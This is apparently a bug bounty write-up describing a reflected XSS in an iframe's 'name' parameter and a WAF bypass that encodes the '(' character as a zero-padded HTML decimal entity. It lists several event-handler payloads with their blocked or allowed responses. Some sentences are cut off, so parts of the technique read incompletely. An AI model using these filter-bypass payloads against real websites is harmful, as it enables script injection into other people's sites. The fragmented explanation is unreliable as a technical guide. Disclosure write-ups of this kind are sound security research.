Hi incredible hackers. I got a private invite, and got curious about the program, so I signed up into the main website and started clicking around and using all functions.
I found this endpoint in which the value of “name” parameter was reflecting inside the “iframe” tag.
" character wasn’t being encoded, so I was able to get out of the
( and ` characters were not allowed and causing a 403 error.
test" onload=alert(origin) --> 403
test" onload=print`` --> 403
test" onload=alert origin) --> 200
I played with it for a few minutes, but I couldn’t exploit it.
I texted my buddy 0xrz who is a true monster when it comes to hacking.
I sent him the endpoint and…
" onload=alert(origin) value="
He told me what is going on here, and I’m writing it down here.
- JS accepts decimal Unicode characters, so we can write
(. Check it: http://www.endmemo.com/unicode/ascii.php.
But this payload was giving us a 403 page again, and it wasn’t a bypass in this case.
- You can add extra zeroes after
&#and it will be treated as
(. Isn’t JS amazing?
Report & Bounty:
Make sure that you follow 0xrz:
Reach me at: